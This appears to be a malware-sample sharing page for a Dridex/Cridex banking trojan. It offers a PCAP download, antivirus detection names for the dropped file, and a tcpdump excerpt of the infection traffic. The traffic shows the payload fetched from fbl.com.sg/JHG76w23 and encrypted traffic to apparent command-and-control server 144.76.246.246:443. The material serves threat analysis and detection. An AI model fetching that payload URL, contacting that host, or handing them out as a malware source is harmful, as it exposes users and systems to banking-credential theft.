Dridex Cridex Malware Banking Trojan PCAP file download traffic sample 144.76.246.246.443 fbl.com.sg/JHG76w23


Acronis Cyber Protect

Download Attachments

  • pcap jhg
    Date added: January 26, 2018 5:40 am Added by: admin File size: 49 KB Downloads: 7

32 engines detected this file

SHA-256bad8a41d33fe0e4cce27f41005e498c0ac26eef9f59099ad2d538bc429e4d289
File nameJHG76w23
File size140 KB
Last analysis2018-01-26 03:17:24 UTC
Community score-105

Ikarus

Trojan.Kryptik

Kaspersky

Backdoor.Win32.Dridex.sr

Malwarebytes

Trojan.Dridex

MAX

malware (ai score=97)

McAfee

RDN/Generic.hbg

McAfee-GW-Edition

BehavesLike.Win32.PUPXAX.ch

Palo Alto Networks

generic.ml

Rising

Malware.XPACK-LNR/Heur!1.5594 (CLASSIC)

SentinelOne

static engine – malicious

Sophos AV

Troj/Dridex-ZN

Sophos ML

heuristic

Symantec

Trojan.Cridex

2018-01-25 22:03:43.757982 IP 192.168.1.102.52880 > 103.26.41.71.80: Flags [P.], seq 0:481, ack 1, win 256, length 481: HTTP: GET /JHG76w23 HTTP/1.1
E.. Ss@…S….fg.)G…P..~j#…P….Q..GET /JHG76w23 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: fbl.com.sg
Connection: Keep-Alive

2018-01-25 22:04:18.691476 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [S], seq 878709239, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..47.@…zV…f.L……4` ……….&…………..
2018-01-25 22:04:18.808384 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [.], ack 72323680, win 256, length 0
E..(7.@…za…f.L……4` ..O.`P….*……..
2018-01-25 22:04:18.812499 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 0:104, ack 1, win 256, length 104
E…7.@…y….f.L……4` ..O.`P…$X……c…_..Zj..z…3Q….?..[…g..Rk………./.5…
….. .
.2.8…………………..
…………..
2018-01-25 22:04:18.931590 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 104:430, ack 1036, win 252, length 326
E..n7.@…y….f.L……4`
`.O.kP….2…………..tE..N1..W…D…… ..+_t…Md.uRI.#o….n…Q.vDn.b]..Z…4..>47….m…’%..F.@H.mR.7b.:.H2…,….\u..s…..u…….7K.A.c.wr|..4n….I.]a…0..8…o…..(;bF.Zi………./..u.V-Dw.#…..].{…7.%….)…J P*./.F.F.!G.., ..+.N…~.e..S.(.{B…..X..+K.LC……….0[.f’ …._..q…….R
…….}#.v……!.”…..Q
2018-01-25 22:04:19.103430 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 430:563, ack 1095, win 252, length 133
E…7 @…y….f.L……4`…O..P……………C..e._b…F-.’..5..Z.z)..s.zSJ…=..5…j….{…w……h….Y.sO-………fPE9.N../.1N`.}….*l\D…1. …g`.{H…&..p…Sn.
2018-01-25 22:04:19.104835 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 563:2023, ack 1095, win 252, length 1460
E…7!@…t….f.L……4`.+.O..P…………..c.2.D



Leave a Comment